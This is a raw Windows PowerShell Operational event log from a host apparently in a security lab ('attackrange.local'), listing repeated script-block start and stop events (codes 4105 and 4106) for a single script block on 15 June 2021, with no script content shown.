EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471006
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471005
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471004
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471003
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471002
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471001
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471000
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470999
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470998
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470997
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470996
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470995
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470994
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470993
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470992
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470991
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470990
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470989
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470988
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470987
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470986
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470985
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470984
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470983
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470982
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470981
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470980
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470979
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470978
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470977
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470976
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470975
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470974
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470973
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470972
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470971
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470970
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470969
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470968
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470967
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470966
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470965
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470964
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470963
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470962
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470961
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470960
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470959
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470958
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470957
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470956
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470955
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470954
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470953
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470952
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
